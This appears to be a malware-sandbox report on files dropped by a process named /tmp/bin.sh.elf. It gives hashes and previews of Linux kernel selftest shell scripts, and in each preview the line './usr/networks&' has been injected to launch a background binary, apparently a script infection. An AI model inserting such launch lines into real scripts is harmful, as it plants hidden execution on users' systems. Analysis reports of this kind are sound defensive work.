                                                                  Preview:./usr/networks&...Display a usage message and exit...--interval=value, --space=value, --verbose=value, --task-filter=value,..--stacktrace-depth=value, --require-start=value, --require-end=value,..--reject-start=value, --reject-end=value, --ignore-gfp-wait=value...See Documentation/fault-injection/fault-injection.rst for more...information...failslab options:..--cache-filter=value...fail_page_alloc options:..--ignore-gfp-highmem=value, --min-order=value..ENVIRONMENT..FAILCMD_TYPE...The following values for FAILCMD_TYPE are recognized:....failslab....inject slab allocation failures...fail_page_alloc....inject page allocation failures....If FAILCMD_TYPE is not defined, then failslab is used..EOF.}..if [ $UID != 0 ]; then..echo must be run as root >&2..exit 1.fi..DEBUGFS=`mount -t debugfs | head -1 | awk '{ print $3}'`..if [ ! -d "$DEBUGFS" ]; then..echo debugfs is not mounted >&2..exit 1.fi..FAILCMD_TYPE=${FAILCMD_TYPE:-failslab}.FAULTATTR=$DEBUGFS/$FAILCMD_TYPE..if [ ! -d $FAULTATTR ]; t
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):413
                                                                  Entropy (8bit):5.253172935744477
                                                                  Encrypted:false
                                                                  SSDEEP:12:cnNKNsMvtphZ+gAh2ph/3NGglqLENL9ZEvW5An:MW/h0gO6hfAGZPu
                                                                  MD5:C7FF2892487A4A9DCCB9497096C07366
                                                                  SHA1:742762D51E61ACEB34E44A410623DE39E5D7903C
                                                                  SHA-256:1F4CB9F291DBEF883CFA0238173E31B10F3571B2EFE1321A7B043DCB3AEE0A96
                                                                  SHA-512:60E00DC9040A73AE4FC833E344AC636F5B5CE3DA9CF8AE6E56A3099B635A55512B8546C2CF3CAB089FD192B2CD25A635CF2AB81B3B28F611C3D82F9434228595
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit $ksft_skip..fi.}..check_device().{..DEVICE=/dev/ion..if [ ! -e $DEVICE ]; then...echo $TCID: No $DEVICE device found >&2...echo $TCID: May be CONFIG_ION is not set >&2...exit $ksft_skip..fi.}..main_function().{..check_device..check_root...# ION_SYSTEM_HEAP TEST..run_test 0..# ION_SYSTEM_CONTIG_HEAP TEST..run_test 1.}..main_function.echo "$TCID: done".exit $errcode../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3539
                                                                  Entropy (8bit):5.262868278091748
                                                                  Encrypted:false
                                                                  SSDEEP:96:EFX2kIR7xG6YdQr8P1PPM5yGdtloNssUGoq2r+dPolt:EFXi7xG5Qr89M5yGdtKNjUGD2ydQ3
                                                                  MD5:9FA7F94959D499382EE4162EC6B3690E
                                                                  SHA1:586F5F28FD9A5FEEBF08777D43248855DCA5C281
                                                                  SHA-256:9324C4C6D57628AF310A26554D5A05D7DAFA44C9964C6785AE255E1C5DE7311A
                                                                  SHA-512:6B906A7B1FBB702B3BD470F970B7F5EF43DDD23D856C78F5CA61AFB804D0F843F492D87ED37C3DA974689F96FBDA2D12DEECA54EBB0044DF5F281369AF71F756
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.# If one build fails, continue but return non-0 on exit..return_value() {..if [ -d "$TMPDIR" ] ; then...rm -rf -- $TMPDIR..fi..exit $ERROR.}.trap return_value EXIT..case $1 in..-h|--help)...echo -e "$0 [-j <n>]"...echo -e "\tTest the different ways of building bpftool."...echo -e ""...echo -e "\tOptions:"...echo -e "\t\t-j <n>:\tPass -j flag to 'make'."...exit...;;.esac..J=$*..# Assume script is located under tools/testing/selftests/bpf/. We want to start.# build attempts from the top of kernel repository..SCRIPT_REL_PATH=$(realpath --relative-to=$PWD $0).SCRIPT_REL_DIR=$(dirname $SCRIPT_REL_PATH).KDIR_ROOT_DIR=$(realpath $PWD/$SCRIPT_REL_DIR/../../../../).cd $KDIR_ROOT_DIR..check() {..local dir=$(realpath $1)...echo -n "binary: "..# Returns non-null if file is found (and "false" is run)..find $dir -type f -executable -name bpftool -print -exec false {} + && \...ERROR=1 && printf "FAILURE: Did not find bpftool\n".}..make_and_clean() {..echo -e "\$PWD: $PWD"..echo -e
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3505
                                                                  Entropy (8bit):5.101999997737958
                                                                  Encrypted:false
                                                                  SSDEEP:96:Iismhd58plWbPrueNH0e5nJeHPeh1Juie5s1eHaeJuT1j9Tt2DT+d:Iibd58eDqknMiJIj0XmG
                                                                  MD5:84519E423ADA34395254E2A97E8275C2
                                                                  SHA1:6D30E47A2EE5CCAA28BA383E5694271CFE338409
                                                                  SHA-256:BAED396869873C4A7953F2C63FB78E30B2CBE68B33AA7C7AF2FC03FB9FBFB188
                                                                  SHA-512:C4878320B03141FF070B8239C2505981FD3216F27B0F51F4F1FE56C7DD8165830759C69C22CF4010582E91509884CE504AA8CA4180B65FF4A1322C44052F5EDA
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..# This test needs to be run in a network namespace with in_netns.sh. Check if.# this is the case and run it with in_netns.sh if it is being run in the root.# namespace..if [[ -z $(ip netns identify $$) ]]; then..../net/in_netns.sh "$0" "$@"..exit $?.fi..# Determine selftest success via shell exit code.exit_handler().{..if (( $? == 0 )); then...echo "selftests: $TESTNAME [PASS]";..else...echo "selftests: $TESTNAME [FAILED]";..fi...set +e...# Cleanup..tc filter del dev lo ingress pref 1337 2> /dev/null..tc qdisc del dev lo ingress 2> /dev/null.../flow_dissector_load -d 2> /dev/null..if [ $unmount -ne 0 ]; then...umount bpffs 2> /dev/null..fi.}..# Exit script immediately (well catched by trap handler) if any.# program/thing exits with a non-zero status..set -e..# (Use 'trap -l' to list meaning of numbers).trap exit_handler 0 2 3 6 9..# Mount BPF file system.if /bin/mount | grep /sys/fs/bpf > /dev/null; then..echo "bpffs already mounted".else..echo "bpf
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1010
                                                                  Entropy (8bit):5.220823243294136
                                                                  Encrypted:false
                                                                  SSDEEP:24:dpXvgl1FYPLVQt0KzCZbeO7zO7fNsiRVSddKXd3SVXaRZVM:dpYl1FMRQt9uZbeO7zO7fNsiRV6dKt3u
                                                                  MD5:1429FE66BCE5BDB1C1BD9D1D6C397EEB
                                                                  SHA1:20C1D8AFADA5DD4A3291ED54BFC11C8255F76993
                                                                  SHA-256:B01345A8859D778A3BDD2D189E3E4D8F1C918D5803B531F61CB25A962CBE2302
                                                                  SHA-512:99B2919EEB9BB93ADD1C00234F9185F17C6D5C480D276C0B2291DD7915AD242704F27DBFD8A76A24C2E5740F4C71BDE1DDD932CCD99796CBC071029C49EFD3A2
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..SRC_TREE=../../../../..test_run().{..sysctl -w net.core.bpf_jit_enable=$1 2>&1 > /dev/null..sysctl -w net.core.bpf_jit_harden=$2 2>&1 > /dev/null...echo "[ JIT enabled:$1 hardened:$2 ]"..dmesg -C..if [ -f ${SRC_TREE}/lib/test_bpf.ko ]; then...insmod ${SRC_TREE}/lib/test_bpf.ko 2> /dev/null...if [ $? -ne 0 ]; then....rc=1...fi..else...# Use modprobe dry run to check for missing test_bpf module...if ! /sbin/modprobe -q -n test_bpf; then....echo "test_bpf: [SKIP]"...elif /sbin/modprobe -q test_bpf; then....echo "test_bpf: ok"...else....echo "test_bpf: [FAIL]"....rc=1...fi..fi..rmmod test_bpf 2> /dev/null..dmesg | grep FAIL.}..test_save().{..JE=`sysctl -n net.core.bpf_jit_enable`..JH=`sysctl -n net.core.bpf_jit_harden`.}..test_restore().{..sysctl -w net.core.bpf_jit_enable=$JE 2>&1 > /dev/null..sysctl -w net.core.bpf_jit_harden=$JH 2>&1 > /dev/null.}..rc=0.test_save.test_run 0 0.test_run 1 0.test_run 1 1.test_run 1 2.test_restore.exit $rc../usr/network
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):815
                                                                  Entropy (8bit):5.201744181978782
                                                                  Encrypted:false
                                                                  SSDEEP:12:d1EHtVRnfZDWwV6O9EO7qHsv9KwaialTDsd6rVYrJREN2jjafDzt90dQfK4n:dMVbKs6AVqHsv9KrxlxrmTrjcD70dz4
                                                                  MD5:6CE0DE76BD02CEB0CCD7F9EFECFE12D2
                                                                  SHA1:CF040700C804B51EAF138D59014350AE29FA6F57
                                                                  SHA-256:B4507BFFC19C0CAE1C5E51ED4C1DF7199ECD1050CC0BC221E9F0C0C9FA97BC91
                                                                  SHA-512:88AF2876EE4E641CFA43BFC8F233110C106B01D99726AC45F1AB8DE9A51E34F3189695496C6E635AB7610E1AA1EC191B208A75A737BC4C3614F7FB8DF5C1255D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.# Determine selftest success via shell exit code.exit_handler().{..if [ $? -eq 0 ]; then...echo "selftests: $TESTNAME [PASS]";..else...echo "$TESTNAME: failed at file $LAST_LOADED" 1>&2...echo "selftests: $TESTNAME [FAILED]";..fi.}..libbpf_open_file().{..LAST_LOADED=$1..if [ -n "$VERBOSE" ]; then.. ./test_libbpf_open $1..else.. ./test_libbpf_open --quiet $1..fi.}..# Exit script immediately (well catched by trap handler) if any.# program/thing exits with a non-zero status..set -e..# (Use 'trap -l' to list meaning of numbers).trap exit_handler 0 2 3 6 9..libbpf_open_file test_l4lb.o..# Load a program with BPF-to-BPF calls.libbpf_open_file test_l4lb_noinline.o..# Load a program compiled without the "-target bpf" flag.libbpf_open_file test_xdp.o..# Success.exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):578
                                                                  Entropy (8bit):5.580525958294917
                                                                  Encrypted:false
                                                                  SSDEEP:12:9nt1L9fIymYVbR6XQlxeZ3qec7eZ30hc2GbxgWDaAJgxEd4n:ht1L9fp6ADeZ6HKZkq/bxjuAJgxEd4
                                                                  MD5:87F640BAAB0006615A81B86FEB324304
                                                                  SHA1:80D2E7ACB3CB4E4E3C96768D2D718B6A6E5C5EC7
                                                                  SHA-256:46F504EA4EC509A4B684D9EEB87FF9C1CEB2FE1AE9A28205FCA3F349E29FE30F
                                                                  SHA-512:A6AA809ADE6841AF63388319942C5A930DC80889850756D9590B61FDC564AB25128258D622B9849AC931CC9E817611C928811933E6163B7D57829D8BB5C0B976
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..GREEN='\033[0;92m'.RED='\033[0;31m'.NC='\033[0m' # No Color..modprobe rc-loopback..for i in /sys/class/rc/rc*.do..if grep -q DRV_NAME=rc-loopback $i/uevent..then...LIRCDEV=$(grep DEVNAME= $i/lirc*/uevent | sed sQDEVNAME=Q/dev/Q)...INPUTDEV=$(grep DEVNAME= $i/input*/event*/uevent | sed sQDEVNAME=Q/dev/Q)..fi.done..if [ -n $LIRCDEV ];.then..TYPE=lirc_mode2.../test_lirc_mode2_user $LIRCDEV $INPUTDEV..ret=$?..if [ $ret -ne 0 ]; then...echo -e ${RED}"FAIL: $TYPE"${NC}..else...echo -e ${GREEN}"PASS: $TYPE"${NC}..fi.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):12942
                                                                  Entropy (8bit):5.326261520608179
                                                                  Encrypted:false
                                                                  SSDEEP:384:DNIBI3p2eSvOMJOuTyL21J+wIm/13pI210:D6Kp2eWXT0wIq13pI210
                                                                  MD5:5663197F18E21DBEE3F75DB935185DAE
                                                                  SHA1:8E4143001A8E3656960C7FA11C7E2A2F1EB3DBFB
                                                                  SHA-256:96C78B0925035DA39102A42C3DDC2F0B16144C86508B06C3D143A639EFD62076
                                                                  SHA-512:D7021F9CFD085ECD1669E5A96F3FC3144126530ED4E746A3059FBEE3D7E3D250BE1F6DBFA34C8F3318A6FB0ADCBD533FD1A097A8792B063732FC9EB124FE7209
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..readonly NS1="ns1-$(mktemp -u XXXXXX)".readonly NS2="ns2-$(mktemp -u XXXXXX)".readonly NS3="ns3-$(mktemp -u XXXXXX)"..readonly IPv4_1="172.16.1.100".readonly IPv4_2="172.16.2.100".readonly IPv4_3="172.16.3.100".readonly IPv4_4="172.16.4.100".readonly IPv4_5="172.16.5.100".readonly IPv4_6="172.16.6.100".readonly IPv4_7="172.16.7.100".readonly IPv4_8="172.16.8.100".readonly IPv4_GRE="172.16.16.100"..readonly IPv4_SRC=$IPv4_1.readonly IPv4_DST=$IPv4_4..readonly IPv6_1="fb01::1".readonly IPv6_2="fb02::1".readonly IPv6_3="fb03::1".readonly IPv6_4="fb04::1".readonly IPv6_5="fb05::1".readonly IPv6_6="fb06::1".readonly IPv6_7="fb07::1".readonly IPv6_8="fb08::1".readonly IPv6_GRE="fb10::1"..readonly IPv6_SRC=$IPv6_1.readonly IPv6_DST=$IPv6_4..TEST_STATUS=0.TESTS_SUCCEEDED=0.TESTS_FAILED=0..TMPFILE=""..process_test_results().{..if [[ "${TEST_STATUS}" -eq 0 ]] ; then...echo "PASS"...TESTS_SUCCEEDED=$((TESTS_SUCCEEDED+1))..else...echo "FAIL"...TESTS_FAILED=$((TESTS_FAIL
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):4595
                                                                  Entropy (8bit):4.759233094756956
                                                                  Encrypted:false
                                                                  SSDEEP:48:9+dS8OIs4J6TSSGKvFUUWPO+UqUzxSdU8YpYjUjC7NfYjX8QD:cp7odrSC7WYjCqjX88
                                                                  MD5:B2FD1A65727D7D547BE1A5BF89A413C2
                                                                  SHA1:CBE271C6A674C5F722844876727B395103222C8B
                                                                  SHA-256:F293BC5B50C83CC9218D5247B196B75F08645850A020A8111B7AECFFF8920FAA
                                                                  SHA-512:D6B5F33DF09E6F60B02243AF2C9971EA59997D9B6004B753D23513A9DFD104CC13C5B792A64F21E99BC6F46158AADDA3B866643603E7CB6906B5E5C28C9C3A39
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..TMP_FILE="/tmp/selftest_lwt_seg6local.txt"..cleanup().{..if [ "$?" = "0" ]; then...echo "selftests: test_lwt_seg6local [PASS]";..else...echo "selftests: test_lwt_seg6local [FAILED]";..fi...set +e..ip netns del ns1 2> /dev/null..ip netns del ns2 2> /dev/null..ip netns del ns3 2> /dev/null..ip netns del ns4 2> /dev/null..ip netns del ns5 2> /dev/null..ip netns del ns6 2> /dev/null..rm -f $TMP_FILE.}..set -e..ip netns add ns1.ip netns add ns2.ip netns add ns3.ip netns add ns4.ip netns add ns5.ip netns add ns6..trap cleanup 0 2 3 6 9..ip link add veth1 type veth peer name veth2.ip link add veth3 type veth peer name veth4.ip link add veth5 type veth peer name veth6.ip link add veth7 type veth peer name veth8.ip link add veth9 type veth peer name veth10..ip link set veth1 netns ns1.ip link set veth2 netns ns2.ip link set veth3 netns ns2.ip link set veth4 netns ns3.ip link set veth5 netns ns3.ip link set veth6 netns ns4.ip link set veth7 netns ns4.ip link
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:C source, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):983
                                                                  Entropy (8bit):5.4677073569376216
                                                                  Encrypted:false
                                                                  SSDEEP:24:L/uELj8SFuFhN/n/kJg6xsK4jkZFpsrpy4Z8I4NJmwYSJtyEE:L//L3Zx94CcbrEnYSc
                                                                  MD5:564EF28E81C3F1C042AC5F894B0C0E8E
                                                                  SHA1:C7C5DF90F4489C94C16489EBC74E5EA0FD01A3FB
                                                                  SHA-256:D4C71542C8F8F69453D200E625BD7C36F4BC84CE38E9A95A5462D1FED58A9EE3
                                                                  SHA-512:57DC61E2FA2786747BA13B4E6BCB73BEF8EE72FF894D766AFCA44711FF30E85D1A92805E504450197BD94ED5672F1835C883D04765BAEF37D77A9166E5339B5A
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.}..setup().{..# Create testing interfaces not to interfere with current environment...ip link add dev ${TEST_IF} type veth peer name ${TEST_IF_PEER}..ip link set ${TEST_IF} up..ip link set ${TEST_IF_PEER} up...wait_for_ip...tc qdisc add dev ${TEST_IF} clsact..tc filter add dev ${TEST_IF} egress bpf obj ${BPF_PROG_OBJ} \...sec ${BPF_PROG_SECTION} da...BPF_PROG_ID=$(tc filter show dev ${TEST_IF} egress | \....awk '/ id / {sub(/.* id /, "", $0); print($1)}').}..cleanup().{..ip link del ${TEST_IF} 2>/dev/null || :..ip link del ${TEST_IF_PEER} 2>/dev/null || :.}..main().{..trap cleanup EXIT 2 3 6 15..setup..${PROG} ${TEST_IF} ${BPF_PROG_ID}.}..DIR=$(dirname $0).TEST_IF="test_cgid_1".TEST_IF_PEER="test_cgid_2".MAX_PING_TRIES=5.BPF_PROG_OBJ="${DIR}/test_skb_cgroup_id_kern.o".BPF_PROG_SECTION="cgroup_id_logger".BPF_PROG_ID=0.PROG="${DIR}/test_skb_cgroup_id_user".type ping6 >/dev/null 2>&1 && PING6="ping6" || PING6="ping -6"..main../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:C source, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):684
                                                                  Entropy (8bit):5.360388977189686
                                                                  Encrypted:false
                                                                  SSDEEP:12:wW/+j9boHrFB8JHQFbqOQFJP4av9bfB44v9bvHJpbg9JpJyizdQuvM9Xs0T+CvGt:L/uELj8SFuFF4EDB4+7ppsrpy4MXsfLh
                                                                  MD5:42E3B4F746976F0CAC55AEF91D587353
                                                                  SHA1:6B8C6DE3531ADA0A3CB20D073D546C36534E0B6A
                                                                  SHA-256:BC8663FC965F917432E546D66EA1078E76D8C4526EF4CCC78FC72111FC71A5EF
                                                                  SHA-512:F51402D79D2F18866294A0F0235A156F0C09976B20077EFF0BDB4B6E0BCB24A9B0CD1C94F15023C133AD8B7D70B60C2740498920272818440A12A413C08427E0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.}..setup().{..# Create testing interfaces not to interfere with current environment...ip link add dev ${TEST_IF} type veth peer name ${TEST_IF_PEER}..ip link set ${TEST_IF} up..ip link set ${TEST_IF_PEER} up...ip -4 addr add ${TEST_IPv4} dev ${TEST_IF}..ip -6 addr add ${TEST_IPv6} dev ${TEST_IF}..wait_for_ip.}..cleanup().{..ip link del ${TEST_IF} 2>/dev/null || :..ip link del ${TEST_IF_PEER} 2>/dev/null || :.}..main().{..trap cleanup EXIT 2 3 6 15..setup.../test_sock_addr setup_done.}..BASENAME=$(basename $0 .sh).TEST_IF="${BASENAME}1".TEST_IF_PEER="${BASENAME}2".TEST_IPv4="127.0.0.4/8".TEST_IPv6="::6/128".MAX_PING_TRIES=5..main../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2541
                                                                  Entropy (8bit):5.348844603657122
                                                                  Encrypted:false
                                                                  SSDEEP:48:rVmWClCN3NSauOhnkBxyCKj7XtLI6HOeSB+7:nQi9Sa7dWEj7XlI6H/wy
                                                                  MD5:486AB5DADB683D5FDFC6BE511C3D830D
                                                                  SHA1:4E2A9023191D7C10655D50C068640D9B14993093
                                                                  SHA-256:5350A91A41B37C4FF9DCE4348A4FDB6C10BCE729B1091C697B053942383CAC39
                                                                  SHA-512:5980A62AB39F9CE5AEE3353E4D55C5D3F45DA7EA3DDC82820C3E3F04ECE63A41420705B53D37DEE1F6E952BB119C0AB735A674E28BE9B229847B66BDD04BB32F
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..# check that nc, dd, and timeout are present.command -v nc >/dev/null 2>&1 || \..{ echo >&2 "nc is not available"; exit 1; }.command -v dd >/dev/null 2>&1 || \..{ echo >&2 "nc is not available"; exit 1; }.command -v timeout >/dev/null 2>&1 || \..{ echo >&2 "timeout is not available"; exit 1; }..readonly NS_SRC="ns-src-$(mktemp -u XXXXXX)".readonly NS_DST="ns-dst-$(mktemp -u XXXXXX)"..readonly IP_SRC="172.16.1.100".readonly IP_DST="172.16.2.100"..cleanup().{..ip netns del ${NS_SRC}..ip netns del ${NS_DST}.}..trap cleanup EXIT..set -e # exit on error..ip netns add "${NS_SRC}".ip netns add "${NS_DST}".ip link add veth_src type veth peer name veth_dst.ip link set veth_src netns ${NS_SRC}.ip link set veth_dst netns ${NS_DST}..ip -netns ${NS_SRC} addr add ${IP_SRC}/24 dev veth_src.ip -netns ${NS_DST} addr add ${IP_DST}/24 dev veth_dst..ip -netns ${NS_SRC} link set dev veth_src up.ip -netns ${NS_DST} link set dev veth_dst up..ip -netns ${NS_SRC} route add ${IP_D
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):5339
                                                                  Entropy (8bit):5.0017094276510194
                                                                  Encrypted:false
                                                                  SSDEEP:96:VNvN4NzN8QxGMuQIHov8MJBeWzS2Dna5Z+kv6jyrm46:bqPVTpu2EFcB
                                                                  MD5:7D056F227B2C6686912434BD207F49A9
                                                                  SHA1:B548FD6A982296E69B285B72674229EAAE224C6E
                                                                  SHA-256:64E38DDDC941634D982632417F5DF6194B3FA4801C4A835CC38BC268A5C20FFD
                                                                  SHA-512:D4865E9EF38F9C76AEEF424521E8056B5C507CD4B95B83182A9C6F09F1AD6A859D5927B34820B84B71E5C823C1720309119BF3D35914199647713B22D398AF10
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..fi.}..set -e..# no arguments: automated test, run all.if [[ "$#" -eq "0" ]]; then..echo "ipip"..$0 ipv4 ipip none 100...echo "ip6ip6"..$0 ipv6 ip6tnl none 100...echo "sit"..$0 ipv6 sit none 100...for mac in none mpls eth ; do...echo "ip gre $mac"...$0 ipv4 gre $mac 100....echo "ip6 gre $mac"...$0 ipv6 ip6gre $mac 100....echo "ip gre $mac gso"...$0 ipv4 gre $mac 2000....echo "ip6 gre $mac gso"...$0 ipv6 ip6gre $mac 2000....echo "ip udp $mac"...$0 ipv4 udp $mac 100....echo "ip6 udp $mac"...$0 ipv6 ip6udp $mac 100....echo "ip udp $mac gso"...$0 ipv4 udp $mac 2000....echo "ip6 udp $mac gso"...$0 ipv6 ip6udp $mac 2000..done...echo "OK. All tests passed"..exit 0.fi..if [[ "$#" -ne "4" ]]; then..echo "Usage: $0"..echo " or: $0 <ipv4|ipv6> <tuntype> <none|mpls|eth> <data_len>"..exit 1.fi..case "$1" in."ipv4")..readonly addr1="${ns1_v4}"..readonly addr2="${ns2_v4}"..readonly ipproto=4..readonly netcat_opt=-${ipproto}..readonly foumod=fou..readonly foutype=ipip..reado
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:C source, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1353
                                                                  Entropy (8bit):5.4396025488101865
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ha7/uT8HyHhKF4mA5I49I4SJHK4M4SdXBBbs4txX/Rp9FQb1:ECmfxdJq4Mdd4y4h
                                                                  MD5:2DAFC47BEFAB85E3AA67C94BB37209D4
                                                                  SHA1:DE81DD3C51199D946742ACBD45F51F702EB2B841
                                                                  SHA-256:CAEBE8046B018B5B70A7A1BF914076882A5B50B1F92ED142A483255431F992FF
                                                                  SHA-512:1E97B52366221DA2310A39E16B0010F874091E5D90C3D55221C8B6B5CE5DA5EC32B51F24A943CA185BBB961CB1CDBDAFE736AF34D99FF7707CCFDE9CE99BD817
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.}..get_prog_id().{..awk '/ id / {sub(/.* id /, "", $0); print($1)}'.}..ns1_exec().{..ip netns exec ns1 "$@".}..setup().{..ip netns add ns1..ns1_exec ip link set lo up...ns1_exec sysctl -w net.ipv4.tcp_syncookies=2..ns1_exec sysctl -w net.ipv4.tcp_window_scaling=0..ns1_exec sysctl -w net.ipv4.tcp_timestamps=0..ns1_exec sysctl -w net.ipv4.tcp_sack=0...wait_for_ip 127.0.0.1..wait_for_ip ::1.}..cleanup().{..ip netns del ns1 2>/dev/null || :.}..main().{..trap cleanup EXIT 2 3 6 15..setup...printf "Testing clsact..."..ns1_exec tc qdisc add dev "${TEST_IF}" clsact..ns1_exec tc filter add dev "${TEST_IF}" ingress \...bpf obj "${BPF_PROG_OBJ}" sec "${CLSACT_SECTION}" da...BPF_PROG_ID=$(ns1_exec tc filter show dev "${TEST_IF}" ingress | \... get_prog_id)..ns1_exec "${PROG}" "${BPF_PROG_ID}"..ns1_exec tc qdisc del dev "${TEST_IF}" clsact...printf "Testing XDP..."..ns1_exec ip link set "${TEST_IF}" xdp \...object "${BPF_PROG_OBJ}" section "${XDP_SECTION}"..BPF_PROG_ID=
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1912
                                                                  Entropy (8bit):5.207312592924516
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yq3bFI7wapJJVcYJJVwYJ5YJSBYJJVPERkm9qQrBrdB/hthTlQirzR3h3h1KkxJ0:5apJJVHJJVDJ2JSOJJVPekmkkqP
                                                                  MD5:CB6386382686DC790D4B284A63DD8B25
                                                                  SHA1:B2602353A56E69BE26A9963A6D53CA4FE8A6A339
                                                                  SHA-256:F44683183AE55B02B07982FBD765DCC6EBB40EB3C1DF2AE70A47DFE75416A073
                                                                  SHA-512:AB990DB5698E05B3CC2E79078005C8F7B44D2F2D5374A951ECB1E20326E72FCE98E3B25EC37EA8C7AD0B4C82498F6173A445BB86F5CF8EA685E379910BC6F224
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.cleanup_exit().{..echo "CATCH SIGKILL or SIGINT, cleanup and exit"..cleanup..exit 0.}..check().{..ip link help 2>&1 | grep -q "\s$1\s"..if [ $? -ne 0 ];then...echo "SKIP $1: iproute2 not support"..cleanup..return 1..fi.}..enable_debug().{..echo 'file ip_gre.c +p' > /sys/kernel/debug/dynamic_debug/control..echo 'file ip6_gre.c +p' > /sys/kernel/debug/dynamic_debug/control..echo 'file vxlan.c +p' > /sys/kernel/debug/dynamic_debug/control..echo 'file geneve.c +p' > /sys/kernel/debug/dynamic_debug/control..echo 'file ipip.c +p' > /sys/kernel/debug/dynamic_debug/control.}..check_err().{..if [ $ret -eq 0 ]; then...ret=$1..fi.}..bpf_tunnel_test().{..local errors=0...echo "Testing GRE tunnel..."..test_gre..errors=$(( $errors + $? ))...echo "Testing IP6GRE tunnel..."..test_ip6gre..errors=$(( $errors + $? ))...echo "Testing IP6GRETAP tunnel..."..test_ip6gretap..errors=$(( $errors + $? ))...echo "Testing ERSPAN tunnel..."..test_erspan v2..errors=$(( $errors + $? ))...echo "Testing
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):902
                                                                  Entropy (8bit):4.342773839740934
                                                                  Encrypted:false
                                                                  SSDEEP:12:xqgzdQEeMHrFzBZSvuNJ/Ez7Mv96zgyirwNVrwFQUAvQ5Dm2Qe7Qs8RBe8K4n:oEJVKU5q1bhNqOUF5Dae8/Yb4
                                                                  MD5:AEB56524F126B615817DE51165E003B4
                                                                  SHA1:ECDE1434B22AFDB0E893A8EE52C03F02D07FC016
                                                                  SHA-256:80B96271B9151951A445595FB8659CB0F67F1664D6F1E0EA6B516EB232A8F32F
                                                                  SHA-512:55A3DC79B34150506C49E3C93C48919ED18FDEBA27966F5F115B089A4DA25B55D7A93B6D1ADF119A23159424F116DAA227918DC8699D44D7EA09C5C4F22A12D5
                                                                  Malicious:false
